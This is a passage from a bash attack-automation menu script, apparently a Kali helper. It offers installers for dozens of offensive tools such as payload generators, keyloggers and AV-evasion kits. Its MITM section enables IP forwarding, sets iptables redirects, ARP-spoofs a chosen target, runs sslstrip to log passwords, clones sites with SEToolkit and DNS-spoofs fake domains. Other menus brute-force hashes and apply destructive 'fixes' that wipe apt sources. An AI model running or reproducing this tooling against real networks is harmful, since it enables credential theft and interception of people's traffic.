  825. echo -e ""$YS"10"$CE") Dracnmap "$YS"30"$CE") Anonym8 "$YS"50"$CE") Bleachbit "$YS"70"$CE") LFISuite"
  826. echo -e ""$YS"11"$CE") Fern "$YS"31"$CE") TheFatRat "$YS"51"$CE") Vmr mdk "$YS"71"$CE") UniByAv"
  827. echo -e ""$YS"12"$CE") Netdiscover "$YS"32"$CE") Angry IP "$YS"52"$CE") Hash Buster "$YS"72"$CE") Demiguise"
  828. echo -e ""$YS"13"$CE") KickThemOut "$YS"33"$CE") Sniper "$YS"53"$CE") Findsploit "$YS"73"$CE") Dkmc"
  829. echo -e ""$YS"14"$CE") Ghost-Phisher"$YS"34"$CE") ReconDog "$YS"54"$CE") Howdoi "$YS"74"$CE") MITMf"
  830. echo -e ""$YS"15"$CE") The Eye "$YS"35"$CE") RED HAWK "$YS"55"$CE") Operative-frmwork"$YS"75"$CE") Netool-toolkit"
  831. echo -e ""$YS"16"$CE") Xerxes "$YS"36"$CE") WinPayloads "$YS"56"$CE") Netattack2 "$YS"76"$CE") Patator"
  832. echo -e ""$YS"17"$CE") Mdk3-master "$YS"37"$CE") Shellter "$YS"57"$CE") Koadic "$YS"77"$CE") Evil-Droid"
  833. echo -e ""$YS"18"$CE") Katana "$YS"38"$CE") CHAOS "$YS"58"$CE") Empire "$YS"78"$CE") NoSQLMap"
  834. echo -e ""$YS"19"$CE") Airgeddon "$YS"39"$CE") Routersploit "$YS"59"$CE") Meterpr.-Paranoid"
  835. echo -e ""$YS"20"$CE") Websploit "$YS"40"$CE") Geany "$YS"60"$CE") Dr0p1t"
  836. echo -e ""$YS" b"$CE") Go back"
  837. echo -e ""$YS" 0"$CE") Exit"
  838. echo -e "Choose: "
  839. read REIN
  840. clear
  841. if [[ "$REIN" = "1" ]]
  842. then
  843. install_fluxion
  844. elif [[ "$REIN" = "2" ]]
  845. then
  846. install_wifite
  847. elif [[ "$REIN" = "3" ]]
  848. then
  849. install_wifiphisher
  850. elif [[ "$REIN" = "4" ]]
  851. then
  852. install_zatacker
  853. elif [[ "$REIN" = "5" ]]
  854. then
  855. install_morpheus
  856. elif [[ "$REIN" = "6" ]]
  857. then
  858. install_osrframework
  859. elif [[ "$REIN" = "7" ]]
  860. then
  861. install_hakku
  862. elif [[ "$REIN" = "8" ]]
  863. then
  864. install_trity
  865. elif [[ "$REIN" = "9" ]]
  866. then
  867. install_cupp
  868. elif [[ "$REIN" = "10" ]]
  869. then
  870. install_dracnmap
  871. elif [[ "$REIN" = "11" ]]
  872. then
  873. install_fern
  874. elif [[ "$REIN" = "12" ]]
  875. then
  876. install_netdiscover
  877. elif [[ "$REIN" = "13" ]]
  878. then
  879. install_kickthemout
  880. elif [[ "$REIN" = "14" ]]
  881. then
  882. install_ghostphisher
  883. elif [[ "$REIN" = "15" ]]
  884. then
  885. install_theeye
  886. elif [[ "$REIN" = "16" ]]
  887. then
  888. install_xerxes
  889. elif [[ "$REIN" = "17" ]]
  890. then
  891. install_mdk3
  892. elif [[ "$REIN" = "18" ]]
  893. then
  894. install_katana
  895. elif [[ "$REIN" = "19" ]]
  896. then
  897. install_airgeddon
  898. elif [[ "$REIN" = "20" ]]
  899. then
  900. install_websploit
  901. elif [[ "$REIN" = "21" ]]
  902. then
  903. install_4nonimizer
  904. elif [[ "$REIN" = "22" ]]
  905. then
  906. install_openvas
  907. elif [[ "$REIN" = "23" ]]
  908. then
  909. install_beelogger
  910. elif [[ "$REIN" = "24" ]]
  911. then
  912. install_ezsploit
  913. elif [[ "$REIN" = "25" ]]
  914. then
  915. install_pupy
  916. elif [[ "$REIN" = "26" ]]
  917. then
  918. install_zirikatu
  919. elif [[ "$REIN" = "27" ]]
  920. then
  921. install_wifiautopwner
  922. elif [[ "$REIN" = "28" ]]
  923. then
  924. install_bully
  925. elif [[ "$REIN" = "29" ]]
  926. then
  927. install_anonsurf
  928. elif [[ "$REIN" = "30" ]]
  929. then
  930. install_anonym8
  931. elif [[ "$REIN" = "31" ]]
  932. then
  933. install_thefatrat
  934. elif [[ "$REIN" = "32" ]]
  935. then
  936. install_angryip
  937. elif [[ "$REIN" = "33" ]]
  938. then
  939. install_sniper
  940. elif [[ "$REIN" = "34" ]]
  941. then
  942. install_recondog
  943. elif [[ "$REIN" = "35" ]]
  944. then
  945. install_redhawk
  946. elif [[ "$REIN" = "36" ]]
  947. then
  948. install_winpayloads
  949. elif [[ "$REIN" = "37" ]]
  950. then
  951. install_shellter
  952. elif [[ "$REIN" = "38" ]]
  953. then
  954. install_chaos
  955. elif [[ "$REIN" = "39" ]]
  956. then
  957. install_routersploit
  958. elif [[ "$REIN" = "40" ]]
  959. then
  960. install_geany
  961. elif [[ "$REIN" = "41" ]]
  962. then
  963. install_infoga
  964. elif [[ "$REIN" = "42" ]]
  965. then
  966. install_nwatch
  967. elif [[ "$REIN" = "43" ]]
  968. then
  969. install_eternalscanner
  970. elif [[ "$REIN" = "44" ]]
  971. then
  972. install_eaphammer
  973. elif [[ "$REIN" = "45" ]]
  974. then
  975. install_dagon
  976. elif [[ "$REIN" = "46" ]]
  977. then
  978. install_lalin
  979. elif [[ "$REIN" = "47" ]]
  980. then
  981. install_knockmail
  982. elif [[ "$REIN" = "48" ]]
  983. then
  984. install_kwetza
  985. elif [[ "$REIN" = "49" ]]
  986. then
  987. install_ngrok
  988. elif [[ "$REIN" = "50" ]]
  989. then
  990. install_bleachbit
  991. elif [[ "$REIN" = "51" ]]
  992. then
  993. install_vmr
  994. elif [[ "$REIN" = "52" ]]
  995. then
  996. install_hashbuster
  997. elif [[ "$REIN" = "53" ]]
  998. then
  999. install_findsploit
  1000. elif [[ "$REIN" = "54" ]]
  1001. then
  1002. install_howdoi
  1003. elif [[ "$REIN" = "55" ]]
  1004. then
  1005. install_operative
  1006. elif [[ "$REIN" = "56" ]]
  1007. then
  1008. install_netattack2
  1009. elif [[ "$REIN" = "57" ]]
  1010. then
  1011. install_koadic
  1012. elif [[ "$REIN" = "58" ]]
  1013. then
  1014. install_empire
  1015. elif [[ "$REIN" = "59" ]]
  1016. then
  1017. install_meterpreter_paranoid_mode
  1018. elif [[ "$REIN" = "60" ]]
  1019. then
  1020. install_dropit_frmw
  1021. elif [[ "$REIN" = "61" ]]
  1022. then
  1023. install_wifi_pumpkin
  1024. elif [[ "$REIN" = "62" ]]
  1025. then
  1026. install_veil
  1027. elif [[ "$REIN" = "63" ]]
  1028. then
  1029. install_leviathan
  1030. elif [[ "$REIN" = "64" ]]
  1031. then
  1032. install_fake_image
  1033. elif [[ "$REIN" = "65" ]]
  1034. then
  1035. install_avet
  1036. elif [[ "$REIN" = "66" ]]
  1037. then
  1038. install_gloom
  1039. elif [[ "$REIN" = "67" ]]
  1040. then
  1041. install_arcanus
  1042. elif [[ "$REIN" = "68" ]]
  1043. then
  1044. install_msfpc
  1045. elif [[ "$REIN" = "69" ]]
  1046. then
  1047. install_morphhta
  1048. elif [[ "$REIN" = "70" ]]
  1049. then
  1050. install_lfi
  1051. elif [[ "$REIN" = "71" ]]
  1052. then
  1053. install_unibyav
  1054. elif [[ "$REIN" = "72" ]]
  1055. then
  1056. install_demiguise
  1057. elif [[ "$REIN" = "73" ]]
  1058. then
  1059. install_dkmc
  1060. elif [[ "$REIN" = "74" ]]
  1061. then
  1062. install_mitmf
  1063. elif [[ "$REIN" = "75" ]]
  1064. then
  1065. install_netool
  1066. elif [[ "$REIN" = "76" ]]
  1067. then
  1068. install_patator
  1069. elif [[ "$REIN" = "77" ]]
  1070. then
  1071. install_evil_droid
  1072. elif [[ "$REIN" = "78" ]]
  1073. then
  1074. install_nosqlmap
  1075. elif [[ "$REIN" = "back" || "$REIN" = "b" ]]
  1076. then
  1077. clear
  1078. break
  1079. elif [[ "$REIN" = "00" ]]
  1080. then
  1081. exec bash "$0"
  1082. elif [[ "$REIN" = "0" ]]
  1083. then
  1084. clear
  1085. exit
  1086. fi
  1087. done
  1088. }
  1089. function errors_menu
  1090. {
  1091. while true
  1092. do
  1093. clear
  1094. TERMINALTITLE="ERRORS"
  1095. dash_calc
  1096. printf '\033]2;ERRORS\a'
  1097. echo -e ""$YS" 1"$CE") Fix no audio issue"
  1098. echo -e ""$YS" 2"$CE") No output in wash"
  1099. echo -e ""$YS" 3"$CE") No full screen"
  1100. echo -e ""$YS" 4"$CE") Error constructing proxy for org.gnome.Terminal"
  1101. echo -e ""$YS" 5"$CE") Error starting apache2 service"
  1102. echo -e ""$YS" 6"$CE") Errors when apt-get update"
  1103. echo -e ""$YS" 7"$CE") Errors when creating a payload with Winpayloads"
  1104. echo -e ""$YS" 8"$CE") Complete fix for apache2 service failed to start"
  1105. echo -e ""$YS" b"$CE") Go back"
  1106. echo -e ""$YS" 0"$CE") EXIT"
  1107. echo -e " Choose: "
  1108. read ERRS
  1109. clear
  1110. if [[ "$ERRS" = "1" ]]
  1111. then
  1112. clear
  1113. echo -e "Trying to get you some audio..."
  1114. sleep 2
  1115. clear
  1116. echo -e "Press "$YS"y"$CE" if/when prompted"
  1117. sleep 3
  1118. clear
  1119. echo -e "Installing pulseaudio......."
  1120. sleep 1
  1121. apt-get pulseaudio
  1122. echo -e "Enabling pulseaudio......."
  1123. sleep 1
  1124. systemctl --user enable pulseaudio && systemctl --user start pulseaudio
  1125. clear
  1126. echo -e "Done!"
  1127. sleep 1
  1128. clear
  1129. echo -e "I mean...Try to see if you have audio."
  1130. sleep 3
  1131. echo -e " "
  1132. echo -e "That's all i can do :/"
  1133. sleep 2
  1134. echo -e " "
  1135. echo -e "If it wasn't fix , then try rebooting"
  1136. elif [[ "$ERRS" = "2" ]]
  1137. then
  1138. clear
  1139. echo -e "Ok...Lets try to fix this..."
  1140. sleep 1
  1141. mkdir /etc/reaver
  1142. echo -e "It seems to be fixed."
  1143. echo -e "Enter you interface"
  1144. read INTWASH
  1145. echo -e "Press "$YS"many key"$CE" to test wash"
  1146. echo -e "Also try "wash -i wlan0mon -a" to display all networks"
  1147. wash -i $INTWASH
  1148. elif [[ "$ERRS" = "3" ]]
  1149. then
  1150. apt-get install -y open-vm-tools-desktop fuse
  1151. echo -e "Restart your vistual machine..."
  1152. sleep 2
  1153. echo -e "$PAKTGB"
  1154. $READAK
  1155. elif [[ "$ERRS" = "4" ]]
  1156. then
  1157. locale-gen
  1158. localectl set-locale LANG="en_US.UTF-8"
  1159. sleep 2
  1160. echo -e "Reboot your system now"
  1161. sleep 3
  1162. elif [[ "$ERRS" = "5" ]]
  1163. then
  1164. service nginx stop
  1165. echo -e "I think i fixed it. Try again: service apache2 start "
  1166. sleep 5
  1167. elif [[ "$ERRS" = "6" ]]
  1168. then
  1169. echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list
  1170. rm -r -f /etc/apt/sources.list.d/*
  1171. echo -e "Try apt-get update again. That's all i can do."
  1172. sleep 3
  1173. elif [[ "$ERRS" = "7" ]]
  1174. then
  1175. rm -f -r /usr/local/lib/python2.7/dist-packages/Crypto
  1176. echo -e "Error was fixed!"
  1177. echo -e "$PAKTGB"
  1178. $READAK
  1179. elif [[ "$ERRS" = "8" ]]
  1180. then
  1181. apt-get -y remove nginx
  1182. apt-get -y remove nginx-full
  1183. apt-get -y remove nginx-common
  1184. apt-get -y autoremove
  1185. clear
  1186. echo -e "Error was fixed!"
  1187. echo -e "$PAKTGB"
  1188. $READAK
  1189. elif [[ "$ERRS" = "back" || "$ERRS" = "b" || "$ERRS" = 00 ]]
  1190. then
  1191. BACKL="1"
  1192. break
  1193. elif [[ "$ERRS" = "0" ]]
  1194. then
  1195. clear
  1196. exit
  1197. else
  1198. clear
  1199. echo -e "Not a valid option...."
  1200. sleep 2
  1201. fi
  1202. done
  1203. }
  1204. function keyboard_shortcuts
  1205. {
  1206. if [[ ! -d ""$KSPATH"" ]]
  1207. then
  1208. mkdir "$KSPATH"
  1209. fi
  1210. while true
  1211. do
  1212. TERMINALTITLE="KEYBOARD SHORTCUTS"
  1213. dash_calc
  1214. printf '\033]2;KEYBOARD SHORTCUTS\a'
  1215. echo -e ""$YS" 1"$CE") Tools"
  1216. echo -e ""$YS" 2"$CE") See hidden shortcuts"
  1217. echo -e ""$YS" b"$CE") Go back"
  1218. #~ echo -e ""$YS"00"$CE") Main menu"
  1219. echo -e ""$YS" 0"$CE") EXIT"
  1220. read KS
  1221. clear
  1222. if [[ "$KS" = "1" ]]
  1223. then
  1224. while true
  1225. do
  1226. echo -e "Available shortcuts: "$YS"reset"$CE") Delete all shortcuts"
  1227. nn=1
  1228. #start sorting out all the available shortcuts
  1229. HOWADD=$(( HOWMANYTOOLS + 1 ))
  1230. while [ "$nn" != "$HOWADD" ]
  1231. do
  1232. listshortcuts
  1233. #adding a space where needed on the output,so it will be sorted correctly
  1234. if [[ "$nn" -lt "10" ]]
  1235. then
  1236. n=" $nn"
  1237. else
  1238. n="$nn"
  1239. fi
  1240. if [[ ! -f ""$KSPATH"/"$TITLE"/"$TITLE".txt" ]]
  1241. then
  1242. echo -e ""$YS""$n""$CE") "$TITLE""
  1243. else
  1244. read KSKS < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
  1245. if [[ "$KSKS" = "" ]]
  1246. then
  1247. KSKS="ERROR(fix=recreate the shortcut)"
  1248. else
  1249. read currentks < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
  1250. size=${#TITLE}
  1251. calc=$(( 35-size ))
  1252. numcalc=1
  1253. SPACES=""
  1254. while [ $numcalc != $calc ]
  1255. do
  1256. SPACES=""$SPACES"_"
  1257. numcalc=$(( numcalc+1 ))
  1258. done
  1259. #~ read SPACES < "$KSPATH"/spaces.txt
  1260. echo -e ""$YS""$n""$CE") "$TITLE""$SPACES""$KSKS""
  1261. fi
  1262. fi
  1263. nn=$(( nn+1 ))
  1264. done
  1265. echo -e ""$YS" b"$CE") Go back"
  1266. #echo -e ""$YS" 0"$CE") EXIT"
  1267. echo -e "Choose: "
  1268. #nn=""
  1269. read nn
  1270. clear
  1271. listshortcuts
  1272. if [[ "$nn" = "" ]]
  1273. then
  1274. continue
  1275. fi
  1276. if [[ "$nn" = "back" || "$nn" = "b" ]]
  1277. then
  1278. clear
  1279. break
  1280. elif [[ "$nn" = "0" ]]
  1281. then
  1282. clear
  1283. exit
  1284. elif [[ "$nn" = "00" ]]
  1285. then
  1286. exec bash "$0"
  1287. elif [[ "$nn" = "reset" ]]
  1288. then
  1289. rm -r "$KSPATH"/*
  1290. elif [[ "$nn" -le "$HOWMANYTOOLS" ]]
  1291. then
  1292. createshortcut
  1293. fi
  1294. done
  1295. elif [[ "$KS" = "2" ]]
  1296. then
  1297. hidden_shortcuts
  1298. elif [[ "$KS" = "back" || "$KS" = "b" ]]
  1299. then
  1300. BACKL="1"
  1301. clear
  1302. break
  1303. elif [[ "$KS" = "0" ]]
  1304. then
  1305. clear
  1306. exit
  1307. elif [[ "$KS" = "00" ]]
  1308. then
  1309. exec bash "$0"
  1310. fi
  1311. done
  1312. }
  1313. function mitm_menu
  1314. {
  1315. clear
  1316. TERMINALTITLE="MITM"
  1317. dash_calc
  1318. printf '\033]2;MITM\a'
  1319. echo -e ""$YS" 1"$CE") Password sniff-sslstrip"
  1320. echo -e ""$YS" 2"$CE") SET + mitm + dnsspoofing"
  1321. echo -e ""$YS" b"$CE") Go back"
  1322. echo -e ""$YS" 0"$CE") EXIT"
  1323. read MITMATT
  1324. clear
  1325. if [[ "$MITMATT" = "1" ]]
  1326. then
  1327. while true
  1328. do
  1329. clear
  1330. echo -e "------------------------------"$RS"MITM"$CE"-------------------------------"
  1331. echo -e ""$YS" 1"$CE") Enable ip_forward "$YS"d1"$CE") Disable ip_forward "
  1332. echo -e ""$YS" 2"$CE") Set iptables"
  1333. echo -e ""$YS" 3"$CE") Scan and select target IP "$YS"33"$CE") I have scaned"
  1334. echo -e ""$YS" 4"$CE") Open the sslstrip log" # "$YS"44"$CE") Filter credentials"
  1335. echo -e ""$YS" b"$CE") Go back"
  1336. echo -e ""$YS" 0"$CE") EXIT"
  1337. echo -e "Choose: "
  1338. read -e MITMCH
  1339. if [[ "$MITMCH" = "1" ]]
  1340. then
  1341. echo "1" > /proc/sys/net/ipv4/ip_forward
  1342. echo -e "Done."
  1343. sleep 1
  1344. elif [[ "$MITMCH" = "d1" ]]
  1345. then
  1346. echo "0" > /proc/sys/net/ipv4/ip_forward
  1347. echo -e "Done."
  1348. sleep 1
  1349. elif [[ "$MITMCH" = "2" ]]
  1350. then
  1351. clear
  1352. echo -e "Redirect tcp port 80 to port("$YS"Enter"$CE"=8080):"
  1353. read PORTTCP
  1354. if [[ "$PORTTCP" = "" ]]
  1355. then
  1356. PORTTCP="8080"
  1357. fi
  1358. clear
  1359. echo -e "Redirect udp port 40 to port("$YS"Enter"$CE"=40):"
  1360. read PORTUDP
  1361. if [[ "$PORTUDP" = "" ]]
  1362. then
  1363. PORTUDP="40"
  1364. fi
  1365. iptables --flush
  1366. iptables --flush -t nat
  1367. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $PORTTCP
  1368. iptables -t nat -A PREROUTING -p udp --destination-port 40 -j REDIRECT --to-port $PORTUDP
  1369. echo -e "Done."
  1370. sleep 1
  1371. elif [[ "$MITMCH" = "3" ]]
  1372. then
  1373. clear
  1374. route -n
  1375. echo -e ""
  1376. echo -e ""
  1377. echo -e "Enter your gateway(prefer "$ETH" gateway):"
  1378. read GATENM
  1379. echo -e ""
  1380. echo -e "Enter the gateway's interface("$YS"Enter"$CE"="$ETH"):"
  1381. read GATEINT
  1382. if [[ "$GATEINT" = "" ]]
  1383. then
  1384. GATEINT="$ETH"
  1385. fi
  1386. while true
  1387. do
  1388. clear
  1389. nmap -sP "$GATENM"/24
  1390. echo -e ""
  1391. echo -e ""
  1392. echo -e "Enter your target IP:"
  1393. read TARGIP
  1394. if [[ "$TARGIP" = "r" ]]
  1395. then
  1396. continue
  1397. else
  1398. break
  1399. fi
  1400. done
  1401. echo -e ""
  1402. echo -e "$PAKTC"
  1403. $READAK
  1404. export GATENM
  1405. export GATEINT
  1406. export TARGIP
  1407. export PORTTCP
  1408. export PORTUDP
  1409. cd "$LPATH"/ls
  1410. gnome-terminal --geometry 60x12+0+999999 -e ./l131.sh
  1411. gnome-terminal --geometry 60x20+999999+999999 -e ./l133.sh
  1412. gnome-terminal --geometry 60x20+999999+0 -e ./l132.sh
  1413. sslstrip -l $PORTTCP -w /root/sslstrip.log
  1414. echo -e "$PAKTGB"
  1415. $READAK
  1416. continue
  1417. elif [[ "$MITMCH" = "33" ]]
  1418. then
  1419. clear
  1420. echo -e "Enter your gateway(prefer "$ETH" gateway):"
  1421. read GATENM
  1422. echo -e ""
  1423. echo -e "Enter the gateway's interface("$YS"Enter"$CE"="$ETH"):"
  1424. read GATEINT
  1425. if [[ "$GATEINT" = "" ]]
  1426. then
  1427. GATEINT="$ETH"
  1428. fi
  1429. clear
  1430. echo -e "Enter your target IP("$YS"r"$CE"=rescan):"
  1431. read TARGIP
  1432. echo -e ""
  1433. echo -e "$PAKTC"
  1434. $READAK
  1435. export GATENM
  1436. export GATEINT
  1437. export TARGIP
  1438. export PORTTCP
  1439. export PORTUDP
  1440. cd "$LPATH"/ls
  1441. gnome-terminal --geometry 60x25+0+999999 -e ./l131.sh
  1442. gnome-terminal --geometry 60x25+999999+0 -e ./l132.sh
  1443. gnome-terminal --geometry 60x25+999999+999999 -e ./l133.sh
  1444. sslstrip -l $PORTTCP -w /root/sslstrip.log
  1445. echo -e "$PAKTGB"
  1446. $READAK
  1447. continue
  1448. elif [[ "$MITMCH" = "4" ]]
  1449. then
  1450. leafpad /root/sslstrip.log
  1451. #~ elif [[ "$MITMCH" = "44" ]]
  1452. #~ then
  1453. elif [[ "$MITMCH" = "back" || "$MITMCH" = "b" ]]
  1454. then
  1455. clear
  1456. break
  1457. elif [[ "$MITMCH" = "00" ]]
  1458. then
  1459. clear
  1460. exec bash "$0"
  1461. elif [[ "$MITMCH" = "0" ]]
  1462. then
  1463. clear
  1464. exit
  1465. fi
  1466. done
  1467. elif [[ "$MITMATT" = "2" ]]
  1468. then
  1469. while true
  1470. do
  1471. clear
  1472. echo -e "------------------------------"$RS"MITM"$CE"-------------------------------"
  1473. echo -e ""$YS" 1"$CE") Enable ip_forward "$YS"d1"$CE") Disable ip_forward"
  1474. echo -e ""$YS" 2"$CE") Scan and select target IP "$YS"22"$CE") I have scaned"
  1475. echo -e ""$YS" 3"$CE") Start ARPspoofing"
  1476. #~ echo -e ""$YS" 4"$CE") Start apache2 service "$YS"d4"$CE") Stop apache2 service"
  1477. echo -e ""$YS" 4"$CE") Start SEToolkit"
  1478. echo -e ""$YS" 5"$CE") Start DNSspoofing"
  1479. echo -e ""$YS" b"$CE") Go back"
  1480. echo -e ""$YS" 0"$CE") EXIT"
  1481. echo -e "Choose: "
  1482. read -e MITMSET
  1483. clear
  1484. if [[ "$MITMSET" = "1" ]]
  1485. then
  1486. echo "1" > /proc/sys/net/ipv4/ip_forward
  1487. echo -e "Done."
  1488. sleep 1
  1489. elif [[ "$MITMSET" = "d1" ]]
  1490. then
  1491. echo "0" > /proc/sys/net/ipv4/ip_forward
  1492. echo -e "Done."
  1493. sleep 1
  1494. elif [[ "$MITMSET" = "2" ]]
  1495. then
  1496. route -n
  1497. echo -e ""
  1498. echo -e ""
  1499. echo -e "Enter your gateway:"
  1500. read GATENM
  1501. echo -e ""
  1502. echo -e "Enter the gateway's interface(e.g: wlan0):"
  1503. read GATEINT
  1504. while true
  1505. do
  1506. clear
  1507. nmap -sP "$GATENM"/24
  1508. echo -e ""
  1509. echo -e ""
  1510. echo -e "Enter your target IP("$YS"r"$CE"=rescan):"
  1511. read TARGIP
  1512. if [[ "$TARGIP" = "r" ]]
  1513. then
  1514. continue
  1515. else
  1516. break
  1517. fi
  1518. done
  1519. elif [[ "$MITMSET" = "22" ]]
  1520. then
  1521. echo -e "Enter your gateway:"
  1522. read GATENM
  1523. echo -e ""
  1524. echo -e "Enter the gateway's interface(e.g: wlan0):"
  1525. read GATEINT
  1526. clear
  1527. echo -e "Enter your target IP:"
  1528. read TARGIP
  1529. elif [[ "$MITMSET" = "3" ]]
  1530. then
  1531. export PAKTC
  1532. export GATEINT
  1533. export TARGIP
  1534. export GATENM
  1535. cd "$LPATH"/ls
  1536. gnome-terminal --geometry 60x15+999999+0 -e ./l132.sh
  1537. gnome-terminal --geometry 60x15+999999+999999 -e ./l133.sh
  1538. #~ elif [[ "$MITMSET" = "4" ]]
  1539. #~ then
  1540. #~ service apache2 start
  1541. #~ elif [[ "$MITMSET" = "d4" ]]
  1542. #~ then
  1543. #~ service apache2 stop
  1544. elif [[ "$MITMSET" = "4" ]]
  1545. then
  1546. echo -e "Clone a website to one of the following IP(s):"
  1547. ip addr | grep '/24' | awk -F "inet " {'print $2'} | cut -d '/' -f1
  1548. echo -e "$PAKTC"
  1549. $READAK
  1550. gnome-terminal --geometry 66x40+999999+0 -e setoolkit
  1551. elif [[ "$MITMSET" = "5" ]]
  1552. then
  1553. echo -e "Making you a hosts.txt file"
  1554. echo -e ""
  1555. echo -e "Enter your IP address that you started the server:"
  1556. echo -e "One of this/these:"
  1557. ip addr | grep '/24' | awk -F "inet " {'print $2'} | cut -d '/' -f1
  1558. read -e SERVIP
  1559. echo -e "Enter the interface of that IP(e.g: wlan0):"
  1560. read -e INTIP
  1561. if [[ -f ""$LPATH"/HOSTS/hosts.txt" ]]
  1562. then
  1563. rm "$LPATH"/HOSTS/hosts.txt
  1564. fi
  1565. mkdir "$LPATH"/HOSTS
  1566. clear
  1567. while true
  1568. do
  1569. clear
  1570. echo -e "Enter the URL you want to redirect your IP from(e.g: thisis.myfakesite.com):"
  1571. read -e URL
  1572. echo "$SERVIP $URL" >> "$LPATH"/HOSTS/hosts.txt
  1573. sleep 0.2
  1574. clear
  1575. echo -e "Add another one as well?"$YNYES""
  1576. read -e ANOTHERHOST
  1577. if [[ "$ANOTHERHOST" = "n" ]]
  1578. then
  1579. break
  1580. fi
  1581. done
  1582. clear
  1583. echo -e "Starting dnsspoof..."
  1584. echo -e "$PAKTC"
  1585. $READAK
  1586. export INTIP
  1587. xterm -geometry 60x15+0+999999 -e 'dnsspoof -i $INTIP -f "$LPATH"/HOSTS/hosts.txt'
  1588. elif [[ "$MITMSET" = "back" || "$MITMSET" = "b" ]]
  1589. then
  1590. clear
  1591. break
  1592. elif [[ "$MITMSET" = "00" ]]
  1593. then
  1594. clear
  1595. exec bash "$0"
  1596. elif [[ "$MITMSET" = "0" ]]
  1597. then
  1598. clear
  1599. exit
  1600. fi
  1601. done
  1602. elif [[ "$MITMATT" = "back" || "$MITMATT" = "b" ]]
  1603. then
  1604. BACKL="1"
  1605. break
  1606. elif [[ "$MITMATT" = "00" ]]
  1607. then
  1608. clear
  1609. exec bash "$0"
  1610. elif [[ "$MITMATT" = "0" ]]
  1611. then
  1612. clear
  1613. exit
  1614. fi
  1615. }
  1616. function dagon_script
  1617. {
  1618. while true
  1619. do
  1620. clear
  1621. TERMINALTITLE="DAGON"
  1622. dash_calc
  1623. printf '\033]2;DAGON\a'
  1624. if [[ "$HASH" = "" || "$HASH" = "\e[1;31mNONE\e[0m" ]]
  1625. then
  1626. HASH="\e[1;31mNONE\e[0m"
  1627. OK=0
  1628. fi
  1629. if [[ "$CORV" = "" ]]
  1630. then
  1631. CORV="crack"
  1632. fi
  1633. echo -e "-----------------Basic options-----------------"
  1634. echo -e ""$YS" 1"$CE") Specify your hash(es) CURRENT:$HASH"
  1635. echo -e ""$YS" 2"$CE") Crack/verify CURRENT:$CORV"
  1636. if [[ -f /root/lscript/hashlog.txt ]]
  1637. then
  1638. echo -e ""$YS" 3"$CE") View your last log"
  1639. else
  1640. echo -e ""$RS" 3"$CE") View your last log"
  1641. fi
  1642. echo -e "--------------------Optional--------------------"
  1643. if [[ "$DICTATTACK" = "" ]]
  1644. then
  1645. DICTATTACK="OFF"
  1646. fi
  1647. echo -e ""$YS" 4"$CE") Dictionary attack CURRENT:$DICTATTACK"
  1648. if [[ "$DICT" = "" && $DICTATTACK = "OFF" ]]
  1649. then
  1650. DICT="OFF"
  1651. elif [[ "$DICT" = "\e[1;31mNONE\e[0m" && $DICTATTACK = "OFF" ]]
  1652. then
  1653. DICT="OFF"
  1654. elif [[ "$DICT" = "OFF" && $DICTATTACK = "ON" ]]
  1655. then
  1656. DICT="\e[1;31mNONE\e[0m"
  1657. elif [[ "$DICT" = "" && $DICTATTACK = "ON" ]]
  1658. then
  1659. DICT="\e[1;31mNONE\e[0m"
  1660. fi
  1661. if [[ "$DICTTYPE" = 1 ]]
  1662. then
  1663. DICT="$DICTPATH"
  1664. elif [[ "$DICTTYPE" = 2 ]]
  1665. then
  1666. DICT="multiple"
  1667. elif [[ "$DICTTYPE" = 3 ]]
  1668. then
  1669. DICT="$DICTPATH folder"
  1670. fi
  1671. echo -e " "$YS"5"$CE") Specify dictionary/ies CURRENT:$DICT"
  1672. echo -e "------------------------------------------------"
  1673. echo -e ""$YS" b"$CE") Go back "$YS"update"$CE") Update dagon"
  1674. echo -e ""$YS"start"$CE") Start"
  1675. echo -e "Choose: "
  1676. read DAGON
  1677. clear
  1678. if [[ "$DAGON" = "back" || "$DAGON" = "b" ]]
  1679. then
  1680. break
  1681. elif [[ "$DAGON" = "4" ]]
  1682. then
  1683. if [[ "$DICTATTACK" = "OFF" ]]
  1684. then
  1685. DICTATTACK="ON"
  1686. else
  1687. DICTATTACK="OFF"
  1688. fi
  1689. elif [[ "$DAGON" = "update" ]]
  1690. then
  1691. cd /root/dagon
  1692. python dagon.py --update
  1693. sleep 3
  1694. elif [[ "$DAGON" = "start" ]]
  1695. then
  1696. if [[ "$HASH" = "" || "$HASH" = "\e[1;31mNONE\e[0m" ]]
  1697. then
  1698. echo -e ""$RS"No hash selected."$CE""
  1699. sleep 3
  1700. fi
  1701. if [[ "$DICTATTACK" = "ON" && $DICT = "\e[1;31mNONE\e[0m" ]]
  1702. then
  1703. echo -e ""$RS"No dictionary selected, but dictionary option is enabled"$CE""
  1704. sleep 5
  1705. continue
  1706. fi
  1707. cd /root/dagon
  1708. if [[ "$HASHTYPE" = 1 ]]
  1709. then
  1710. if [[ "$CORV" = "crack" ]]
  1711. then
  1712. HASHCOMMAND="python dagon.py -c "$HASH" --bruteforce"
  1713. else
  1714. HASHCOMMAND="python dagon.py -v "$HASH""
  1715. fi
  1716. elif [[ "$HASHTYPE" = 2 || "$HASHTYPE" = 3 ]]
  1717. then
  1718. if [[ "$CORV" = "crack" ]]
  1719. then
  1720. HASHCOMMAND="python dagon.py -l "$HASH" --bruteforce"
  1721. else
  1722. HASHCOMMAND="python dagon.py -V "$HASH""
  1723. fi
  1724. fi
  1725. if [[ "$DICTATTACK" = "ON" ]]
  1726. then
  1727. if [[ "$DICTTYPE" = 1 ]]
  1728. then
  1729. DICTCOMMAND="-w $DICTPATH"
  1730. elif [[ "$DICTTYPE" = 2 ]]
  1731. then
  1732. DICTCOMMAND="-W $DICTPATH"
  1733. elif [[ "$DICTTYPE" = 3 ]]
  1734. then
  1735. DICTCOMMAND="-D $DICTPATH"
  1736. fi
  1737. else
  1738. DICTCOMMAND=""
  1739. fi
  1740.  
  1741. $HASHCOMMAND $DICTCOMMAND | tee "$LPATH/hashlog.txt"
  1742. echo -e "$PAKTGB"
  1743. $READAK
  1744. elif [[ "$DAGON" = 5 ]]
  1745. then
  1746. echo -e ""$YS" 1"$CE") Select one disctionary"
  1747. echo -e ""$YS" 2"$CE") Select multiple disctionaries"
  1748. echo -e ""$YS" 3"$CE") Select a folder with disctionaries"
  1749. echo -e ""$YS" b"$CE") Go back"
  1750. echo -e "Choose: "
